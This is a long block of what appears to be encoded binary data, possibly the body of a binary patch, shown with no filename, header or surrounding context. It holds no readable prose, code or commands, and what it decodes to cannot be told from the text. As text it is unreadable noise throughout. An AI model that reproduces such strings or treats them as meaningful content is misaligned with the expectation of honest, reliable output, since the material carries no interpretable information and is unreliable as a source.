zHax^L%)61?_Amqx)xH6GZUQjVnYEo@l0Zb$WryG%gtoFHl*Cd~b@%zmT`m8+aUquC zCqEFOz=y)j6A6)8VB%LQL|}t4i%jWh;P>xAH`DO)N`?FcU@cHNt>>=x5|boQl!3rk zYZq9%f?zE&tA*e41myrI(q=*96FMSt3-Kg^1{Tipy!am)ePcy$re@ZbcVKdGRRUyy}x&G*oX`V0^6&FP`CSdtyIE zkU;#EaNQON_Xl@Jfl@!F+Ed`FV3@FeXfb<@8-FBFVO2#Xf!kOb*b$TpF24pl3z*PUxoAFYJT~-~c-q($zLc2mkXWu<;TV$6}D(8}eDZGAG&hoKuT7 zr`-~NfFFxl4g+v`TFo0BF}HTXg{OtbQRk=wBuoNC7MM=Ps(j+{6E6WVrDJn=XDgBu zc9$6J7~kY~rxI$1&uIZ6?Ev8@#Cnl3{CNX1u~5R(O05Ae{kau}bAe;QlDq9^r*Len z!lLT+qAK9RJjlDGNA)RTbM|m&Y#5Z-p?#?xxBrm0SUK<-3N#6V5IV)l#7{cjqDsyk zSMdgY_2!!Hpx%a3#zTSC2avz|mSHWMl$J-;EgnwY=6Myb155qxbk%h#)6=@O?Ssxd zeI&R3h&j6rr)$t0Q|rgw%ROJKGF2DPYKD9PywJcWm$m6l;lfzk3#)rt)cPchdb>kQ zBByZYX`WWH4q38z!@iEuvICc%djfdr zu)e-g(0lDV9DcxP%-=Q;VYXZ=IcE>Ty1t1=9kPIB>};V}@SzNN{-+Dljyc>8R2>hx z2y|g$pm@7{8M5Egp1_*VjcoIF{i`VRGS~?;l5AHv`JtfI5*P@j%X*%yFvv_}4xb7a zsRnS7;Cr-tK3JD~&$~HfgJ5fLTN(_D1)Ie{v8euxyoV2z>U~Je%q=pZk$@B}@F)+| z$`AgHfS%~xE-+0RVnEOXiG_$&oRF?T*BSO?61Z{#5V3=aM0yL6z=xg<1)u9L zEe3kQtTY0$8!^|b z^J#&s%YsiZuxD=}4z3R2%X+X%#d(BI{{%<@0FIv?)4l|aZ-g0JaT@i@1fsxF*!Ihv z5SJ5I^ygaDS9Rh5IHqMtJQAWA$p6gap0t6uKwM^+XgjCsRa=&}A&m>PH_{mNs!44#tagWLXz1(qdjs$DYO`brIWs>O` zo6k5C-|w@vwIsIoJWy9Y54|rX)aa z7jaz`>{HkTHBD_X#krWj0X=pm@RdpFZWsJ|o*bMLvSC&P{&p9}bXh zHg5s2cA!mv7+ilEzy2%$n6oW?=o*Nkcs&6%jSlP8-;xIk2*7%HbFF8?3T!M&ZWPHm zT{N-KWb_z6<_~{f{6*c#F~*tAr`*uWNqY1N5*6lH{R9bea(D`oyw!BIyd4?dgPJZ4 zr!~0u9v9gH)$WrZ>~$2ntTss9sm235aL$JjhI*+}#+2<(T$8dhYvu`bY79g$_d>ur z^@nv0WIAym`IQh*8y@K`{;QQ>XFD>3dhZWkG;?wixMwu$VaW=XPu;N z84FFW_*W>+i?+W9_`3sY2VT*GkbcMRu7#V3xxgp>e_hVRpqOmKj7{Hkl~xDv!z75# z6Z(%_oO`p7Kq)Esd1-a;m)Q?LK)s>$7Fnx^i{9&Dh>V^JM;;(lA#A;`WFe&Lh4Ar3 z*>rDh<@bSa0da6Od)6B}=U^dvL1{IplI4BPbKo(rb9d&ef9dzvE+7I?<)=O080t8` zly8x}0cXo!Jm>KiTEAhO$G6n;aLnb=NvPMrx%bRIL4O7+VS{hW6Zn2J!3J2LU(PSP zsvP#=4zMTSk-yvJeJ-Sbpq|lG=BVzBK%M(^)%%ya(`q=1H|tdlvg&U0m+8Efx~b4V z!tZhT&-Z6RyRqKv=Xd5izC8F)fmH5`xba1Z!NP_E#oYLU!@k0Gflk{;^ggJhLhR2`PoA2rDulBe0c5!}z zMZ?gi0Ddf>OL7;CK;7R4Dc-P+*=;v{g(_fe;c1rPXM7LWaZXdJM~Xj2lEAis!P{bm zk_=GKGRUqNRPzPu9SQK1)$ODOdwah(xaksp5mmX%(xn8(Kj|0q4)}Y<(eB&qm@r&` zxW!8VSFWD#kq6HNKAB+J%%{r)++bWVbMm|i*zSI5Ds^vGJm^h0Ud>{_vAZB);!ozm zP=m~l=i9&1S(`DJU)rutnD`mXO|mz+XS zJ_jma#~)h&%HX0PN|joOAtWP;j~D=_8PeI+dF9lClk65w^6BN&yY0>Vk|YtTC0dCm zJ$14qlrUn9O-f4Pz@^v|Cmi4)4wXm-4Y597c}m-DomOT7W5pYak5oPyR-=e$nAwek zNQHtNc9<0^AuHDiW=6K-TF8Ny2UCwKzv1oyj>L2bxK#(FHA@ZE9vrRt}PX z!A@K=DBH?mu53_{%9hrAnI8@Emdv3YY+z6N*vG8GI(V;_`{Gkve0Va}is8$YnXhB& zkBXw>Zx4Wu&W9&*x+KfHgmzF!;)D7YPqF)KtM7x^K_(kKb&d=0E}RHyTpsVkM?RrP zgq9B44rL(GdU05sOsYwaCgz|q^5*e$lukVxhh8nV3ULv;1*;NpN)x{;m&VZM=C=y`tu-mAmp(#a&n+d{*6@Hrxe~A2B(iFOrH*|rG7K=K zFbWoOOwxtKN-vv5R-8anb4;|%jvsH#0a?x8rBz~3p@X$DNbDq6y@m_{hY5fZAjwiO zWMnJ6WtJ1Ut`{z9R^StesrpaXpGJ(|X2O{QGi?+O|JP6lg09_GPNoC377CQi(KCHo zLSR|m`uo@_C@l;GOrcb89U4pa=GM1mFw!c?DElcFTu&nu-}Kz1wlGlW5=BZe`Y2fJ zEKa5znmn{iH2KHPBi5=E3qKJI#j?vl(72Id&C{juq!ayyG`>KY>wcfFOY3&z4#%#l zim`t^Q;Rk^w@x61HTT?UB$U>MNt?XftxxPJsrB^?cMf#PJ!gz2wEC!{_@(a(psELN zrOIM(Gq6aLhNWYa>G-Y8C_5@G(}VXymGQWm8rQ@S0WZe(SnOF2qJ%KgphKJDwL@pI zya=H-X7H`S8&wb9kz(}rYLlKgOL=`G`10CgCw1zZVU4qoWQ3k|QUI!gQos3yyT07G zkyB^3sF_0whN1vxJmYp;cFWE{J1?KE7t|(`(pM4|$t@9qYnvMC8C)gSqvU_fL!rJU<6uItb_* zkLPSYcWi;kJ!@nyb0EJi2Umscaa;6J?hqmn?t(`6r-@+F2auw@1M9g1Bh08>ifWY) zQm_hC?vKSG36n~AL&?8bdU&}z>8wNnt$nUG4ttsGN=29AkiMua+IXo4uL1C5nhylnor4kDcME8b$f!XxXTZLVHL|#+opHs!>=&J@CHa>7O)5N+EthoJ*x0=ij3^ zw#KQWfI3fRCF*GJXXy`7g7yVmk;c^&BKoYz9yvlR*GgI<0J=pkQ+?{H2RPxqgz3{w zKtPXD1`=Q**lu?(mo0-bTzD^o(QHbI#umQJWGulSwFr2bRiVyrmt>KpG%dsFcXfLO zZ?6#b@F|qc7o4>}H7eAYW1Mi`!mP4qjkHqur!x++GsNtSN!4l$eI0=U@!SG~RuiJY z$3;sG9u@sg`Rp^7U&8rCeZlz5`s2+-A+Bk6De3erl`crR|AKZ6F08ihYTUc&Vd zs#KoXz}H-cMG@g@YJ*4UyVLF^9wM6$bQfGKd7|_+t~*M8Qxz^aMri=>q49@$`{{Pa zPV>iNcGbFwn%5~CE-^fhK!=0xasRkF9?RL8*9b{^XtZ$ax-~ghcld;z`|GiCg0Fq} z)6y?~6M9z9R{Of$AjpZp+sdAMPQ<1{>S;}WHJ*ZuAo+4XaO07zDkB;$`WpRmRKaA5 zp+qU;ZF28lL4<&-LIrti^t(hQ7FV(L^D! zSCO9%>{-JhC?kDJ3q-JzU|b=9>b#LCd9OYUj_BTi0yac}>rHRJIrzQA>N9|TXOOJ` z{p7<@dA-wea)M&MZ*|Hz{_4nEBVlWvb$!(n9k|Z?r(0152_FCT&_QWjvVGTkk1n=KmDKj&=Pg0Qbaw zi%=>gIw%Dd;hDf9#hsg+SuGptbMfiWOYtku*M7?5*idMFJ=;tn!oIx{h;!d9g$u@!yr#haxnFHN28w|aC$?Qu<7$aKWsLsXoxlGu9AR; z8aR%_X`l689CmiG+mS4|`V#Gf{s1Y|9~tl5{KoN0?KVgE=$R&3cOFNzxeh2)6poHe zgqEx@Gt|V)42FnJ{Zv9X3NuraLdMfdxI z(W|V|U!BK;iOjkiYVhJeBkaV>s`pu*?_atw3x;Rg!&N|Lw+DNbi7g&xs?D^Zmo5et zpgzdRjm+SxBz~lEl4{A`DNX1-TZ#VIT{OM#+B2WhlX-Z5srd})SDg?kEsDR(tLRe@ z(#b5J6U+0|wVAKl6~TMtvr5=h!^>gEvpJzQA);#;Jc47EtrQC-GA^c0gelkNW{mtX zcmjtjNPPuSzO zT$4y6?Nh4%_Z2d{nU^m^*^$;fW@4dIGKkv$-a)&X173tnqSU4sNrT4ljxaWMc%t+7 zTe5$tv;wds>Vcya)b(@GKZfM*_qeJ!{vJWuo;tNo6?F**DQ32`T#NfLiMd4!jf}P~ z2jldDDV9v7UU)Fy8phDy9hxLySfK@1PZCW+B=zs6t4DXdlPbN4za^2-{d}!e%t*Of zCms7^@W1uPBFZY|^IS$K-N|DI%^qc}B#}+Ly-8A~PT+E(n*ZQZZ7~U=)hoj;dinI+ zu%IP_lnFfgXO}5^8QfH+?`BQ9)uxtAui{iQ_%BXqM6hSWsI7qoJ)L8~@2~wItymCB z->DiGgSD+Uev|1|i&&nukq>$J`EteBK zX#6fff?Jc|(!EfM-Dp@@uAiR7uyOz8xtz;Hy;u8b-p24t3xFjST4A9`DT7)`QLcut zQQ#C~TJ^K&2Xe zS)<7yE$DyI;A7R6N{lYph8mS|Dn?J)-kuslfdf(xlL_#zlcwDxttBV5KRnSC)gmc{ zxfCVS(W`+fw_-W~+DP1y8?}y*iHDepdT1Trh8$j?`AM(lGqE04Hqy2J3>j$%cfpy} z#xvZlT7YHYMuM5Ctm-_Zy$r#X?&ITH&O(?USrn8-Wqc4;gt=Ri;d|2JOZM9idZi z!ca|Nw1jy$dUqIP+@4i`>rK1WpRLi^_ckU@3hUexZ>z*N;!Hk=j?Ar-EZFo%bkKLg z9_4**OkXwWvrw3G0_MHS7aST}cBY-e?fI_TV>)m#Qf7g0EwCF@ryQaK$2SbZ!T|&A z-2tz0CU1WzQHYXZGf^3w;z3La&_b(+OvXdG45W<-?wPtuOd;+`YFLg;lsMP%$@?hL zJjhPvHqkyA%Or_O@uA_>=uCQc@VQ%~5ev{$c@=-6z$)r_M7z`;8@%TsId`{owdcX@ z_$QR^Bp+J7;cn8R1r_9$C$_*-do(2MmaZ5HX3|RRqGvJ$7KFRG(6ox+xXJLtq|Hq?>;mwgRL9%Pj6BySp1 z?J-O|NPhdh`6{dxGcIXy99bGSalHD#wA<0~Ul+830Bli0l=MzLg((hExm4SGO)<_il}0!Rw(J?5s$wFktA2eKSGJCEZA<=br4RR=uOL4g9Jw zXoVIzt#CApJOfwnQK`4InV!-Y__M^wYIbT$2rT`r#Hqh3#mc>X{6UvN}0tM3Nf8**U=YU`Ms|OJjVp zR)MbiP`S-jx>UIs@G3Q1x?mQ8sEq8O4m zi+Uv3nG4R_x1x?M)YuyT<~Q;Bk~%wfXlaAmpHTZF+j*d)(lZ8pYIzwSFRWem+&g)Y z(!wRaN%Lny-a8VvaG1Xo2{w1|NwHC79u%|Qs=3=JW(0n5d10=BML;9ov})JQ+Y(NU zT)Wd!-NN$Bap*1yf>P0IF+*|!W$5zx}YDyU{8~<1$b)~9EmnG&h8P#I?7&Uo* zoasCPq8?x?xdoi{flFe6Ah(=oCyzvijLB{vflyd9B*uzLl$d&Ey;f4d^iF)zyz3{U zNtV{(FMPE+olmG9AMXr(POHIi@8ae!H)8g6D;J@^@NuDpo*PE9gJ$tl9YVL98PqU^H#lb7D{tT?9 zSZ8#;p)Nz@RBNV%v^NbzSzc#QwHvB~5a%YCl%JFZRGQ0nE95rE}-*p>QYcQir=59QUV641(n}( zrbU8{^2YV9CcCzDdKdXf7UU-))ho0JKRr|YsvMZ(OA-Wn5a(79F%U}6%X+giFd z*NMr_?jm7-oEsIb8l6)ID7&Rv1MjI?Z5xQV}jEHc@G zq7m(>nkB97BimX)QVikge>y~f6wNC^B#EA920n&2Ur@=8XdcQQUn6N?Mcn3O3p)zv zfJJ+)*4PDM>*H}qu!tpHSNy$Ij>7TBF;W>PgT8V0I5UqmI4oI>; zJX7-82^qZheq7PdEj`Yw!kxCv^9SbL8p~ltvAMqJlkG`Er0sFZUfs>`EwaoW2m{~Y?JC9IsODz&X8PAox6#iep^LtLImoYAiSQgcBh||9$Nqr8LmK+*3(FU8O zK&4)tkEK{7Nw-0V;rSgtu!pkCkxg%4h%Q(+Nl+q56b_(l#O}{=o5tnqb{0vV20hnG z`~GW%3j>+Vw(zQFieVI^ZBrSrCw>(W^MV}s0hyOX>B?Nvjr7PSsI_YPCleu(aHzE* zv?&rS5+O^B0T*#PQLvSyVXo$Ye5;$aR=4>~ZoYP_ld5I_s}XnF<0+kIv>5Vos*KAOR=?bYeB8ihN!kI{0#b93YQ65z(as`qL{J+av>HLH8!a* zwB*HL5>ea&0H9|sEik1q6=u|kzxEk)VAi!wm^5JoR^uUH)$pi}km|(yV*edkiYkAw zuuj`(v>9hSsAi3=AMzsB4L;8kyyGF0%lUxG4E4}ugEpAga2COLbSy`jm=I?|3MyH- z)oxlRr|OD*{dAzbF`gso*c^VS@?pA2Gy3b!VOv1ur=>SNxwh*bg(~tICiF$i7Q=xk zX*X#Z)sosEE@v~*?1&_xd9u$5;?H5Yr2d&%Rjo(I(+3FYM`?e&YI5P6; z<?K|JR<$sD6EP0MaZf?9iMf#BLUTh;K!r9rQpBA;i&tOLPW*+`<&pHcqn8OdDu1F9rq8aCr4sfdj@-Bo`C2+Fh`EnH;9S@HocBG~d#>kx?%yr!yU!jLA}@7x!=+@f_UFfUv+`$NLgGMS~)&^LERSnQWU>4lA%F;;wzsFzThLNw|0 zdqNQHPHaYAOq|}8ex`&f;%BD}u*Q>O7hg;-Usq)u?=!Ljax@ale}(?bAdP`cwPxCD zOq^6L`5sy(8onPRgeoQnKaRpAZ#rIagl}G23zegkxC%HFfq8B;`jh?iKLqy9H^9)@hp*Hc6I1|v-x+Hx$UKS#KvSwg; z3^@Qzk-m92CH*_ZkVc;A0tPBge=nGuhD5jtb;V?r>a$&L_y~iIjAGvKWw8z9DDjGX z%=t?rK$s_y}2M`gw(5Pl>`Cli_Fk2pMZiKl>Ru&yxI+F$gxG zJCz03DFZR@+reeUUYJjPbdcK>PG{~)L&M;w59__eZEvY?Ff?U^Q$X7H6uF+d(mOOV zMM61x@NvW6b6%yH3wt`NaBOJzH>VNwJs&=PzdYCW>K;cw;kQW9lDmRh@0qCW)lAEm z{#w@mnJs*iffUuG4aSK)=yRE$DHE)7qQA%6;PoPM^$dK8b5MHXg{G+42az&GYTf2#o5=0mrN%fI>xoIEqi;T7;SmX{H*Jo<@00>-=Z2fh2am~S`K8?5E<>Wa3>|cp& z4)^u@#Qvve^?5BT_macOg8A3dO1dY$N5w#;-VLX1)@S|%3(k@1Cu2GW(?HOBe+V54 zSBeEQS86kP`)&TX4|OU8>T~`foyRnLi^Iss9P7{}$;{44?{L|||FB;u7}MAJ?_O$@ zshI74%x?^9*Jsa~1I%RFLkrRu%8OU~!Lt9gfDc>T-btHTD1prDKT8B<{=WaPUaY0* z=b?YlOOC5SUV{vY2x+zCIQC`(!bS7Wsl9_-)M~T}> z(u3r~?2%CQ8ys&%el*Z5X2GSee?eRqq|y_ciHNo8bs4Rg_pq(ap!oT0{W}yP-Za_Q z^W003?E$$ARR=Eoy{u+6Z#Fz#bwH0Sj>6uY==}YpK!Qk6BAE+29&erWdOh3S5iFc~ zGnC9Tm6m3+2AUqLpGaAp-?i=^?#SNUdnET9ZPm3&zgM;3ao@n(SF{W&V0`^FZf$A( z(VtBoqhQTHWSVYw?3Z+VrT*Vm*Yr(;&@_e;b3WYu_k6mR(s#7vrpPoOh0DGaAUm5> zwqlY5`B&O(PV zn)=FRnxpj#2A59?|9t8t^rbkoUNn$=cG_P4t((gsU4A4~u}C7l{toq<-VM$FnjUCO zD==_u>0WHVY4mzbNi9L)wZ%^M5$~4tTdN(1ORdX|k6aqVk5@#?@X1ayq0wJY4)k(Y zv?bS3MutB}O{u4hJZ!;*#xz>1D{lgh6hZ48<4PAnrK@~bZi57i!4l*TxJZycEkwH* zYFM18^bFAEDYvs8xmvV#kPYKoJ10Yyv@XO~3CJNha6f}a-BsS_i5r;r zJf94PQ0Y1${3V#V;!)B~E_B+Gz4o^%@(+&H5Tbo8Y_lVhw-|cfh$CKM$8tGra=G)s z4ok?N9t)sZc;KZt4EZ56YJ!1}Pq38FmrSv@YwE?(R9Le{ktS#=+doa(+v?cZsrQvxJ$zxXRc3g|Z**E_^sh{}hu`>Dsqx|m$+g6PKeixplQg5Fyd-iLxdrxiZ`1PSm;0!rusYvqHBLcW5Pz7j%y@|AvSLjKy7 z{)R#UCY1p;LV+%of!;zvft5kwLcwvB!6`xyb1EM`7kX4t`KVqfq`fkvM<{ftGIUBP zY_T$ILnwT!GW<{|;G1B znt7y`S7bo?k1$pGd)57a+o{J@PcB~0XciE4!h@yUzzfEv`@~E^JXmMgwE~pwQVsB5 z&JEl#YmSnSam#awb|exxV|L^{ufI*MV3#81#qBT#R~Jt0nCOCF1HF05+UEn5FfsLl z`fArC5SHRbPrCfcGq-k$NEZF;Mok(FMA7=& z9#oB1H|#*KTw@|Tp#G-ELz8kDj_q%A*<+l+Yvy@i%iPW%esh}D=J2xJSJb63s;k27 zwFLO-fIC)4T~pQljXUr(_+{NW8@8;^W1<%|a9%&YKsQo?xCe9%p+;&X{&*A&f%*bH z%58Ra&qVvTYSL>&rnYJ=#UtgV`o=AW#=Cc(PTkTlc1MiVGP8@%$z&m=M4D4-3Uu9_ z@1C`fHR?G9_ zmy>p87d?0gUI^E@MOyJijSDXOqzzgxFf_f|9m3A;QSRQaEik`gBi=TpPK70iZ>U|@ zFeXA1yb#;lx_P^EBG66WgU#LAo#*vriYN4sr87QSzHDdqHfh}ucopTX2}G9YLO(0l zz0eRZc85<_xGinq!3d4TMPS1LfXPW5$Sfd8hYYHCju@|Zijl*8hm6K}c*4%7`UClq zx)TX}K~w{CW1oE2Wze~p`Kj*Y5ZE^)LB3bZs~T!_c<03tk7bUgwd1O2B|!*0M}iwx z7~zfxFHCh6ODl zWM%-5TOw?JqO5P+HJm6Iu|7WhgQc21C(p0)xF%+N|4(m-j4^9a7Q9mY*+q|D{7vIxC0cZ^~>e${oJK|8QRy~KjiUyiHqM^YL^my)vPI8D>2|J zIuKQ^c3q6E_n$`G-?%0XLbI@t_+?QjBbO-pdR$e{;gL%m(@TP8!ufwmgS;w42HP*U zr$H-wu*a%SPviSs=5Vk5U^TpDHRlZcJe%^~?QWkptd1~LKTG~!n z{f?gd$T-HSA044BB^CvtSn}bXOl|u{E%op5S0hsmflOJB)F!1@yYe?4T-rOVvhZHo zI&pGpbT#$)t0vE_7h~z?Wi~E5{Yy;4k0L1qJ=SiO%JtVE5?$kWkO(*Ha|R8q2bx8p zwX}^z2LumocUnHWUfB*`ZC8ezHlf;ex#Z1reO)~~e1l&3@GoTC!AaNUuKP90>vzUCbnf&ux@;@@U;B=| z>wZV2_fCBM!cKe_O#YVoMm*K8-CRgB@4BMbwI9a&-w$eJ{fm^IE-6n% zojpzM(Ae&{oGDt&CH?$ItNbUny|Q}n5?-WM6it4hxlFnR@socW zXZTh^T2cM!>6KTz{snVS%Z!YvruhDR@BT*1BW$n+TKxB9Uu37Yiu83qbf&-jkGmoZ zcujsnp~z3k+@{xWwHc&p@e!RhKlYPStI6&DG@jGhP_r2j(}kc zACW@v!rwgT5RI+z#|AuC3o=4}igY*v>Yr=6Oz+}92*yl)0E`eXr{-1WX^*-sC4KI6 z8yJ%uz9oZ%2G~N36@$DCl6&=i`g>a>=^uA$EQuQxh9Yo*YRu;_CD`>RSO2*mpbGyE z@$}?|t8-Y9T!^ZLqMcMqkK48c#Zgo=!t>B^zRQ{ax2~|^-t9`X>+V{b?9J_YZi;7WlW>y}&)(neb0n z81#^_xk+{bRUGkYII>?`Qvtf zoyE2gHXobrke{a~zu5?Oz0pWE`B3%;4ug+56#k97>$9n(dtvv3K>_b!kQR2^>n^EuV3`n{{-rfNm~{xwI#JM!V!hrXZ3^A&>r zVITSL%vYPf3g`ZP!n$hNar|%n_v!nUQMQfsH=&PC_Eug6Q7?vv{`|JH^eQ6a5DQoT z`7M>q{1%YR5P^P&s-kz2VKn5 zswZoi(`tYJFwfv&+*vak3|CoZH7{6a&1!RpvCQcRJj(L7@SuYlX&b-7=UCUX5$OWgi-_@jAl7)azBjp_&J*k?@|q;$!^3Q8oOj!|WeP@BfUi6^P!!1zTBOCe=f zTve6o25HiucO|C3oy&{*V9lV$ZjTUs`AZ#FgB+naXVTLtI|0kv}q=%FrQM6luu5QxN|I%;b{)~ql6(We;}@4=?CHX{6eVu51}i#!)`sI&n+;QNpI`G=_t`TMM@V~c z&B(`*4J+%#kl+jSmy(mkd2vs&#a(eU9e-eEu0y{q3b)GziVA)A3Ko^=;UiwfnK=@# zIA1d)8<2tS{)=xw&ofn24!qttTT0#(QEW%Ogt39@^}^$FTzdW*O40YzomEBk(@}|f z=@EObs>j_KL0!k&Mqb7kM?^^wqC$np z2^KN-|Bd0!r>`h|-`lq&Ay5%TR**6Nt)`i#l{;X<{qa?fMAjxiz5{?rWOyi2lL>d0 z4IU%YdOm~^810I{GIsIaVS18}Jpi6UO1tBVr?@?(k6|ng1Q1B{FtL7Q1wmaE3z$Ji zps$JS01Rsfm}CyX#dr}yL}D1IBN8TlOhQDZM%`r@`GapvyjnY*z}aDkc)=d2*;-5w z=_qDSDJB6`>dB$$P+l?nMBNcy`i#7#VVS0(X0yj}xQ-HmQWI(%SF0gz7h-}tM6li5 zw~OJ(8=SG28?wz;2N?YOP%KqMJby7p72?F9O1O?!TZQhC7OHe+7zTK0)pGqGQb{L@Uk0iHF99Q>8HlyV}yW(`GQ&+YDF zAcIbJKS!TYL7-|y3NS0R1Ls>ziK*ALl6wm)=s`a-OsC?iZ{afXEM&Xm`nv9J5|~GX zFg9lsZNeHLrAuthl+khD@MOqoh~C!%H>6X0T4K(K*%c+J=}6LiAY}lD)KyerabbWM7nhT6!v`f$NKRT69?uEBM$26PpqoXS zCSx%R6%)etl>_BNAzlie1Y3N|?Wb*wj^&nkX1SkZHZ6k~M)mQ{BDAGSdC`QZN%6C9 z0H!0K$V@&m5tjpL`T&Ek1z5%NRZI}Z6yP=YA(GYH45Dn@AMyxRnA4#SAA6tmSe3Oo z_&3L_$zro+*F9V>w+@4mv9g{%89E#L4zJy4fI>G04}%A9EPq_vvjLJ=1Nv||XMHH_ zW?Rm-)z5kuu=u*&yNO%J9L7tmelSnv%~=-&3~|Jb@B!Pk(DzI-E|FldOo@NHPx1b2 zcQs4P&oiIYEtn`P(;Cc7*E~uQ+ks*jT&|eC8Q|9RY9W+W<7rNn7Y7Ta1z$Ahvba2qazf7%Jf*&i-oKGD zi7D{h9ai1UuD(KqdV;XDrz8gNPkd}n7qae-jRU$KI`t&SIo zpAD{nz-R16mcCzd1}0LRsOo+4J_7CUd`-o*+G2#nN+X#S+q(cof^5N8Vv)7~?8f(% zvS;}C%&!VX7tYw(<+>*g?4(M3{v}8&p<5%fQv5Fa7vP^sdB8mT`n|5}9S?+Lw_?aI zBsB@<;E6~>mB`xoO9lM8e{N^bNiTx)10de!iM*I`Ajj24k4R5MR2_o%z``_QPmU(t z_=-@jzyRD~9_89J#>@7wv|tg$ph|A3(6^S!K5>@%(btq!tSNbzmf}zDMf%!c4QMhH zu4OJ{ZFG%Qb?bj0AJg(=e7vh=QbBmUjf(T`9OPbXN+}fSj=i)+lzd^(+|pYgssaRz z68FqDy**R7BnPNqH62z{+kr2ZCOZNnv4B<3OHkF-aqJ%Z@CQ_>b%5A+VQr973x#WM z>d<8H-s5(yP;1Ln>>E7Au*X@lOCl}AiTf*XJEHmX!@SBam~z^(;`m=NwQIYACkH$6 zZO{cC^FNZ}4rk5mEui5yx?ed-=Wk@} zhZ`NTcTz3I6r)Yr8<_ffjAR=5{4Hr}f65z3_5nN@ywdg##P|*^O1~yFyhJ}1&)Kf{ zGtvZ}#$c&nhM8hC3-Ab9N+*K{LqXK<4Iq@xS1~(qt+vI8))W3-IvwqD6lF3Ais*77 zsD1`q_I@9NeLY27RgKoC_`Z*nTDqixe+!A9efd%__MmSXgTg_T2SNN~GePpDf(noz z>B3as=?M5o>#(030VgAN)@S#%HqL{SIGHnzIx;pYn8u_D0LJ9pj{9isnJxZaC{*Jm zw&J(28?Hb~f=I_e@kBS;;}(ymcU^aq5*bz}tU2u@NZ3?LkV&Igt z+`{jf9XMfTB#z+#1`kr+MGv^V<0pVN4QanscZ+Q1klbkT)6i+%g^_XVsT!9*R6%;x zSu<8zgg6Lp+vH@p{dE}y1nbiG5v|Ulo}7|ZoN+4@hsMJr0;c5at{rmnBfaFu7((5G z6j7WsTBADo;8+klnfS#_^1cQM^{0w^ecF5EH|4a{ z$V063HS{AOM+TGj3Nc@y9840}ucwci#4`*z8^Av>FI_l`6(5NVweLXXo1rLRPxpbf zc3J>yVIS z)fE&aVV-(<)i62Zj2XK$=#6V>xFn$@GH5YF{0f;o^3`@^6dZc#e4NAjrPlvGA?k~nFG+$oLssRR z9_^gi_84DB1;h#8DKdit4K*#Ob7Nb?Y!0Uq3~`0t z=!aqC^zmhm+;dKQ)4muVx7oLc%4CMT5`{Mzkn&q7QgT4EA}1lx_B@1e!U9gJJddRN@_!rpj^jd0;^Gp6X&p&5`n^Aj+`o=I1m?n zHfWzoxsI1xhiRtbmgEIdu_o!nyShwWvh+k?VFJwHX}Fa@trLin?Hsz(yyi*2s=rt0 zD{eK9w7HS3Gbbi2eI*fI%!%(=_!!A*^uqxuc}s@*MZ-t%JYUTnCVo4tWEA~BGULLa z?9+vtFQIbdU}T|7z9tQbRlU1d z5kpfY{$`{I&^Q=0*|W2fkZ3Q^WoD&lKc)LEO5H4WX|mJ&y)Z@uThM`Wh`J|~&k`)P z9wqAs1+(gr&?p?b-b-^fOKeTw{E&>Y$ZD_ey(+3_DA|YS0B+x)FoiJzh4|tqSfE*J$~=0SD(^lE-vdCz zAUH@h`WpsX>i!9s{736bFEP5L^6A-Jnv~vqcq;0EU7wBp+$^Q9#e>T^4_N`WnEEQQcCB zWg_YZj)Ycys*c0(n*J74g0))zaxr)-59;XUOsIp(?RPj(EEie)+nm4BR#*?!v&Gpj z0swu@BHz9p7CXM>&?x%wjy#V?Ge0AsKZ|tG{bI%+9d^e71I<*{b)^&JSBYVr9)(#GaG;Y-Zb&02&5c#XK)3V9wX}%R^fhrRz?2K%;#Lj_;7QZaDXM z_nORbGh~z*bKMy7Hrp(+YS%g|l4GHF>aey-`Sr7(%_c7~pc;9_+*$nP_l1RI$SI4) zEkQ*`^gdeT{-@(_S+)6CZ5CGJEJ@C3S6MZ4KelJZeiuZb-koB~ukuOWS;(`&;$(y+5@lo1b$tuG-Oh> zvspaJA>u)t1rR8yiud)qF%)5}xbzv$UEVNYKCjzfnioEgkq zX^+_BRtrnF>=y@DENW2|yfu~!mK}Qq>4Wqln=uk#M(?ML9``~0IM)-EP7?LCz<}~) zw%>7aA~v(7u)Fw|Qg}=U`5LR7%K8~La~3>fcr{Fl!`v9l z%qU-1MEh&Eg;ji0m}whx=*GvxHTGidDj%1muPg%&q$u%GKE9Vj&a0?y};u4*OGI{xVg;XZz92wYVj6MyGra3sxEJWd$=eO`mvAMBF}txg9^clgY#X{vLcdc>4BE(AzRlUm`v- znij>Uh~R2>g>cEs1SOu3_ie7$-UjBg_w}A#-F*Ew@rRIZho2T}vWf2(o6a!EG)#s=wg|1qd`P&Nl1b6rbO?L7WGD!v*%bu6*l6J`IjLfHDj$w7haKY`E?=bg#unPLu4 z_AZ+=wVie&rESOU>CF{eHu`6eww|Rk|2OsI1AeE>al@`HfEvUUx+^_w7mZRw*vDWD zb?jqVZ4&I`ZYaIl@E7camWBz$Dvo$u$_Tbjts zy*oap=y`W;J%3!EH@0EI`mC!{lwad!?{C&_?Yfsa-7(Dt-f#c?qa%>OjQWILxM&-> zmsWCu(2u%C|6l-PVw?P6h|_1{!SKZhtC~Svs=n{&`NDk1L>k17$0Xj;`%TD9 z>-$a0e@OP5Qa+mSn^vRJ`_E`F8u-s@^E~mN)0Ld`pEtb55U_CD$ROaIiS3hsMGK$F zfF+vr#e$KH?dAL>JGxhMx^9U;H(ROL7;iH|3qLfFwH4Rgb z_UhlFLiU@d4MPsvKcs{lzCM}?IqIRJLMeTWMxkGacv3@;$0VmizfE0Z4EsK3WE6I? zXqy^#`rc{z4p&nCOyr7B+Np3|D`oJ~t=Rpfp*b3;;TE~_R> zL11#`CU@st-dL8H_@J@D{iOLq-_I4SAFB-`Xcx-QvNR+aYHp>vXO$RMRq1%u+~F?0 zi@e8DZd507`vqr7wMD?o8-pS-c_K9$cY9HRt~y8&H0YKNf+^zcI#&e-{(=Pz6IRr; zV0lm|)nSiw5Z2@vvokFx-xJXi2AeXjay6(SYTbCRvt3+`ZC5jCPXF6)#$pFT5r~Z7 z%aJfKyF|FAFg-l)CQSt&NUtzZSSRl$;uC=tX=c~f4~l}Fvp}g!$zo;4EFCKAqv1m1U+#|AQ*3M+O>X| zl1mH@CIa>JgPbaxL(DAwQ~{Sh#NVk`AOsnlE6@QG*UXE1;;I=jI{pbL`o{FsT#^xrwPXzS9QG%^A?a0^6|fu&gf_R8gnWi7Epn&i@GTmDpu<(M(yDW zPriCJz+U`JKF#&+e()tQB+AvW1-{hf?xHcf;3Zhh-X)c}wv{>w81X))F^JXHkD^Nm zFD>N|SHE%HVvei0wOo|y>dqDTYrYxPmdSmVP$tB^qkw9SVC#kjEvbw*3N|#|llbcU 